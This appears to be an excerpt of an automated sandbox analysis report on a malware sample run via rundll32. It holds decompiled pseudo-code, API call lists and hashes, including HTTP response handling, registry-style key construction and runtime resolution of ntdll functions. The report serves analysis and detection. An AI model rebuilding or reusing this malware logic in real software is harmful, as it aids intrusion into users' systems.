									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04B9705E( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                0x04b91555
                0x04b91555
                0x04b91565
                0x04b91568
                0x04b9156c
                0x04b91572
                0x04b91577
                0x04b91590
                0x04b915a4
                0x04b915ab
                0x04b915b2
                0x04b91605
                0x04b9160b
                0x04b91611
                0x04b9164c
                0x04b91652
                0x00000000
                0x00000000
                0x00000000
                0x04b91611
                0x04b915b8
                0x00000000
                0x04b915bf
                0x04b915cd
                0x04b915d0
                0x04b915d3
                0x04b915df
                0x04b915e3
                0x04b91645
                0x04b915e5
                0x04b915f7
                0x04b91635
                0x04b91640
                0x04b915f9
                0x04b915fc
                0x04b91600
                0x04b91600
                0x04b915f7
                0x00000000
                0x04b915e3
                0x04b915b8
                0x04b9157c
                0x04b91582
                0x04b91585
                0x04b9158a
                0x00000000
                0x00000000
                0x00000000
                0x04b9161a
                0x04b91622
                0x04b91627
                0x04b9162a
                0x00000000

                APIs
                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,746981D0,00000000,00000000), ref: 04B9156C
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04B96E43,00000000,?), ref: 04B9157C
                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04B915AE
                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04B915D3
                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04B915F3
                • GetLastError.KERNEL32 ref: 04B91605
                  • Part of subcall function 04B9705E: WaitForMultipleObjects.KERNEL32(00000002,04B97CEC,00000000,04B97CEC,?,?,?,04B97CEC,0000EA60), ref: 04B97079
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                • GetLastError.KERNEL32(00000000), ref: 04B9163A
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                • String ID: @MetNet
                • API String ID: 3369646462-2109406137
                • Opcode ID: cfad791de38a57b8e68fa8b7559b0e9c6e878b733c4b6376cf888265ef8a4321
                • Instruction ID: f725cfb32744c79803ce4ce0348bc70a7f7fe41820d11de156669712031e3109
                • Opcode Fuzzy Hash: cfad791de38a57b8e68fa8b7559b0e9c6e878b733c4b6376cf888265ef8a4321
                • Instruction Fuzzy Hash: 8F3100B5D00349EFEF21DFA5C88499EBBF8EB08304F1449BAD552A2241D775AE44EF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B96246 Relevance: 13.6, APIs: 9, Instructions: 145stringCOMMON
                Download Yara Rule
                C-Code - Quality: 43%
                			E04B96246(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x4b9a3dc; // 0x5109868
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E04B976FA();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E04B976FA();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E04B929C0(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E04B929C0(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E04B91AA4(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x4b9918c;
						}
						_t70 = E04B9583B(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E04B96601(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x4b9a348; // 0x56d5a8
								_t102 =  *0x4b9a138; // 0x4b97e82
								_t28 = _t105 + 0x4b9bb08; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E04B91AA4(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x4b99190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E04B96601(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E04B94130(_v24);
								} else {
									_t92 =  *0x4b9a348; // 0x56d5a8
									_t44 = _t92 + 0x4b9bc80; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E04B94130(_v8);
						}
						E04B94130(_v12);
					}
					E04B94130(_v16);
				}
				return _v28;
			}



































                0x04b9624c
                0x04b96254
                0x04b96257
                0x04b96264
                0x04b96267
                0x04b9626e
                0x04b96275
                0x04b96278
                0x04b96285
                0x04b96288
                0x04b9628b
                0x04b96290
                0x04b96295
                0x04b9629d
                0x04b962a2
                0x04b962a7
                0x04b962ad
                0x04b962b1
                0x04b962ba
                0x04b962be
                0x04b962c0
                0x04b962c0
                0x04b962c8
                0x04b962cd
                0x04b962d2
                0x04b962d8
                0x04b962df
                0x04b962f0
                0x04b962f7
                0x04b96309
                0x04b9630e
                0x04b96313
                0x04b9631c
                0x04b96325
                0x04b9632e
                0x04b96344
                0x04b96349
                0x04b9634d
                0x04b96351
                0x04b96356
                0x04b9635b
                0x04b9635d
                0x04b9635d
                0x04b96367
                0x04b96370
                0x04b96377
                0x04b96393
                0x04b96397
                0x04b963d0
                0x04b96399
                0x04b9639c
                0x04b963a4
                0x04b963b5
                0x04b963bd
                0x04b963c5
                0x04b963c9
                0x04b963c9
                0x04b96397
                0x04b963d8
                0x04b963d8
                0x04b963e0
                0x04b963e0
                0x04b963e8
                0x04b963e8
                0x04b963f4

                APIs
                • GetTickCount.KERNEL32 ref: 04B9625E
                • lstrlen.KERNEL32(00000000,00000005), ref: 04B962DF
                • lstrlen.KERNEL32(?), ref: 04B962F0
                • lstrlen.KERNEL32(00000000), ref: 04B962F7
                • lstrlenW.KERNEL32(80000002), ref: 04B962FE
                • lstrlen.KERNEL32(?,00000004), ref: 04B96367
                • lstrlen.KERNEL32(?), ref: 04B96370
                • lstrlen.KERNEL32(?), ref: 04B96377
                • lstrlenW.KERNEL32(?), ref: 04B9637E
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: lstrlen$CountFreeHeapTick
                • String ID:
                • API String ID: 2535036572-0
                • Opcode ID: b74bca426eec2c41c706056d629caf7af58ed4da0bd980469276b206f77b6c81
                • Instruction ID: fb75b9d9522a42ee7cc1c0ecb0ccb755b7f8b34f87f9454c81cfcac6c72237dc
                • Opcode Fuzzy Hash: b74bca426eec2c41c706056d629caf7af58ed4da0bd980469276b206f77b6c81
                • Instruction Fuzzy Hash: 4E514C72D00229ABDF12AFA8DC44ADE7BF5EF44318F0540A5E914A7210DB35EE25DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B9236F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B9236F(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4b9a30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x4b9a2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x4b9a2f8 = _t6;
					 *0x4b9a304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x4b9a2f4 = _t7;
					if(_t7 == 0) {
						 *0x4b9a2f4 =  *0x4b9a2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                0x04b92377
                0x04b9237d
                0x04b92384
                0x00000000
                0x04b923de
                0x04b92386
                0x04b9238e
                0x04b9239b
                0x04b9239b
                0x04b923db
                0x00000000
                0x04b923db
                0x04b9239d
                0x04b9239d
                0x04b923a2
                0x04b923b4
                0x04b923b9
                0x04b923bf
                0x04b923c5
                0x04b923cc
                0x04b923ce
                0x04b923ce
                0x00000000
                0x04b923d5
                0x04b92397
                0x00000000
                0x00000000
                0x04b92399
                0x00000000

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04B96914,?), ref: 04B92377
                • GetVersion.KERNEL32 ref: 04B92386
                • GetCurrentProcessId.KERNEL32 ref: 04B923A2
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04B923BF
                • GetLastError.KERNEL32 ref: 04B923DE
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                • String ID: @MetNet
                • API String ID: 2270775618-2109406137
                • Opcode ID: 4aa24cd264e0b4fbb17e7f98f6334614d4bb4a4a9948b3e7888d70a2927febe5
                • Instruction ID: 6751cbe0294a2eb9184968cf565e7a9800e7f612effb2f8aa4409e838319a4e3
                • Opcode Fuzzy Hash: 4aa24cd264e0b4fbb17e7f98f6334614d4bb4a4a9948b3e7888d70a2927febe5
                • Instruction Fuzzy Hash: C2F012B4A44342FFDF584B356A19B143BA1E709751F1048ABE526D72C0DA795C84CA36
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B951D3 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                Download Yara Rule
                APIs
                • SysAllocString.OLEAUT32(00000000), ref: 04B9522D
                • SysAllocString.OLEAUT32(0070006F), ref: 04B95241
                • SysAllocString.OLEAUT32(00000000), ref: 04B95253
                • SysFreeString.OLEAUT32(00000000), ref: 04B952BB
                • SysFreeString.OLEAUT32(00000000), ref: 04B952CA
                • SysFreeString.OLEAUT32(00000000), ref: 04B952D5
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: ab88fc900f2c9ecaecb227a475217ba949be870e62e928e34ce7fd1b76454f90
                • Instruction ID: d5cb28a79357e15c9c5e584896e65a261d3f7e500f35e217ef7bf68fec38275e
                • Opcode Fuzzy Hash: ab88fc900f2c9ecaecb227a475217ba949be870e62e928e34ce7fd1b76454f90
                • Instruction Fuzzy Hash: 86415F32900609BBDF12DFF8D845A9EB7F9EF49310F14446AE911EB250DA71AD05CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B97422 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B97422(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04B96601(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4b9a348; // 0x56d5a8
					_t1 = _t23 + 0x4b9b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4b9a348; // 0x56d5a8
					_t2 = _t26 + 0x4b9b761; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04B94130(_t54);
					} else {
						_t30 =  *0x4b9a348; // 0x56d5a8
						_t5 = _t30 + 0x4b9b74e; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4b9a348; // 0x56d5a8
							_t7 = _t33 + 0x4b9b771; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4b9a348; // 0x56d5a8
								_t9 = _t36 + 0x4b9b4ca; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4b9a348; // 0x56d5a8
									_t11 = _t39 + 0x4b9b786; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04B92C68(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                0x04b97431
                0x04b97435
                0x04b974f7
                0x04b9743b
                0x04b9743b
                0x04b97440
                0x04b97453
                0x04b97455
                0x04b9745a
                0x04b97462
                0x04b97469
                0x04b9746b
                0x04b97470
                0x04b974ef
                0x04b974f0
                0x04b97472
                0x04b97472
                0x04b97477
                0x04b9747f
                0x04b97481
                0x04b97486
                0x00000000
                0x04b97488
                0x04b97488
                0x04b9748d
                0x04b97495
                0x04b97497
                0x04b9749c
                0x00000000
                0x04b9749e
                0x04b9749e
                0x04b974a3
                0x04b974ab
                0x04b974ad
                0x04b974b2
                0x00000000
                0x04b974b4
                0x04b974b4
                0x04b974b9
                0x04b974c1
                0x04b974c3
                0x04b974c8
                0x00000000
                0x04b974ca
                0x04b974d0
                0x04b974d5
                0x04b974dc
                0x04b974e1
                0x04b974e6
                0x00000000
                0x04b974e8
                0x04b974eb
                0x04b974eb
                0x04b974e6
                0x04b974c8
                0x04b974b2
                0x04b9749c
                0x04b97486
                0x04b97470
                0x04b97505

                APIs
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04B970A7,?,?,?,?,00000000,00000000), ref: 04B97447
                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04B97469
                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04B9747F
                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04B97495
                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04B974AB
                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04B974C1
                  • Part of subcall function 04B92C68: memset.NTDLL ref: 04B92CE7
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: AddressProc$AllocateHandleHeapModulememset
                • String ID:
                • API String ID: 1886625739-0
                • Opcode ID: 925fa0ff5ca64ed2134ef798f5672e5584a45fef040a29a5a3c671aa62294158
                • Instruction ID: 1dafda0902d1737d5836f3398272ab42e098f664143b77decd3f55599dbf3f16
                • Opcode Fuzzy Hash: 925fa0ff5ca64ed2134ef798f5672e5584a45fef040a29a5a3c671aa62294158
                • Instruction Fuzzy Hash: 60215AB061471AEFDB20DF69D984E5ABBECEF08754B014166E504C7211EB78FE08CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B94467 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E04B94467(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x4b9a3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E04B92EAF( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04B95F6A(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E04B94130(_a8);
						goto L29;
					}
					_t64 =  *0x4b9a318; // 0x5109d00
					_t16 = _t64 + 0xc; // 0x5109e22
					_t65 = E04B92EAF(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d04b990
						if(E04B92331(_t97,  *_t33, _t91, _a8,  *0x4b9a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x4b9a348; // 0x56d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x4b9ba3e; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x4b9ba39; // 0x55434b48
								_t69 = _t34;
							}
							if(E04B96246(_t69,  *0x4b9a3d4,  *0x4b9a3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x4b9a348; // 0x56d5a8
									_t44 = _t71 + 0x4b9b842; // 0x74666f53
									_t73 = E04B92EAF(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d04b990
										E04B94AA9( *_t47, _t91, _a8,  *0x4b9a3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d04b990
										E04B94AA9( *_t49, _t91, _t99,  *0x4b9a3d0, _a16);
										E04B94130(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d04b990
									E04B94AA9( *_t40, _t91, _a8,  *0x4b9a3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d04b990
									E04B94AA9( *_t43, _t91, _a8,  *0x4b9a3d0, _a16);
								}
								if( *_t101 != 0) {
									E04B94130(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d04b990
					_t81 = E04B92A10( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d04b990
							E04B92331(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E04B94130(_t100);
						_t98 = _a16;
					}
					E04B94130(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E04B97B55(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x4b9a3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                0x04b94467
                0x04b94470
                0x04b94477
                0x04b9447c
                0x04b944e9
                0x04b944ef
                0x04b944f4
                0x04b944fb
                0x04b94500
                0x04b94505
                0x04b94670
                0x04b94677
                0x04b94677
                0x04b9467c
                0x04b9467e
                0x04b9467e
                0x04b94687
                0x04b94687
                0x04b9450b
                0x04b94517
                0x04b94666
                0x04b94669
                0x00000000
                0x04b94669
                0x04b9451d
                0x04b94522
                0x04b94525
                0x04b9452a
                0x04b9452f
                0x04b94578
                0x04b94578
                0x04b9458b
                0x04b94595
                0x04b9459b
                0x04b945a2
                0x04b945ac
                0x04b945ac
                0x04b945a4
                0x04b945a4
                0x04b945a4
                0x04b945a4
                0x04b945ce
                0x04b945d6
                0x04b94604
                0x04b94609
                0x04b94610
                0x04b94615
                0x04b94619
                0x04b9464b
                0x04b9461b
                0x04b94628
                0x04b9462b
                0x04b9463b
                0x04b9463e
                0x04b94644
                0x04b94644
                0x04b945d8
                0x04b945e5
                0x04b945e8
                0x04b945fa
                0x04b945fd
                0x04b945fd
                0x04b94655
                0x04b94661
                0x04b94657
                0x04b9465a
                0x04b9465a
                0x04b94655
                0x04b945ce
                0x00000000
                0x04b94595
                0x04b9453e
                0x04b94541
                0x04b94548
                0x04b9454e
                0x04b94551
                0x04b94553
                0x04b9455f
                0x04b94562
                0x04b94562
                0x04b94568
                0x04b9456d
                0x04b9456d
                0x04b94573
                0x00000000
                0x04b94573
                0x04b94481
                0x00000000
                0x04b944a8
                0x04b944a8
                0x04b944b4
                0x04b944c7
                0x04b944cd
                0x04b944d5
                0x00000000
                0x04b944d5

                APIs
                • StrChrA.SHLWAPI(04B9175D,0000005F,00000000,00000000,00000104), ref: 04B9449A
                • lstrcpy.KERNEL32(?,?), ref: 04B944C7
                  • Part of subcall function 04B92EAF: lstrlen.KERNEL32(?,00000000,05109D00,00000000,04B977C5,05109F23,69B25F44,?,?,?,?,69B25F44,00000005,04B9A00C,4D283A53,?), ref: 04B92EB6
                  • Part of subcall function 04B92EAF: mbstowcs.NTDLL ref: 04B92EDF
                  • Part of subcall function 04B92EAF: memset.NTDLL ref: 04B92EF1
                  • Part of subcall function 04B94AA9: lstrlenW.KERNEL32(?,?,?,04B94630,3D04B990,80000002,04B9175D,04B925E4,74666F53,4D4C4B48,04B925E4,?,3D04B990,80000002,04B9175D,?), ref: 04B94ACE
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                • lstrcpy.KERNEL32(?,00000000), ref: 04B944E9
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                • String ID: ($\
                • API String ID: 3924217599-1512714803
                • Opcode ID: 0e5702a371555ab8d059464e4d5d3ade75df4b16406b435449d3ff729ccfe606
                • Instruction ID: 2c02cb74811f43e41f861afe8fe919f8933dc13070bf3ad18d0b426691b22492
                • Opcode Fuzzy Hash: 0e5702a371555ab8d059464e4d5d3ade75df4b16406b435449d3ff729ccfe606
                • Instruction Fuzzy Hash: 8D511A7150820AEFEF119FA0DD40EAA7BFAEF48354F0085A5F91596120DB35ED26AF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B92AD6 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154memorystringCOMMON
                Download Yara Rule
                C-Code - Quality: 46%
                			E04B92AD6(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x4b9a348; // 0x56d5a8
					_t5 = _t103 + 0x4b9b038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x4b99298);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
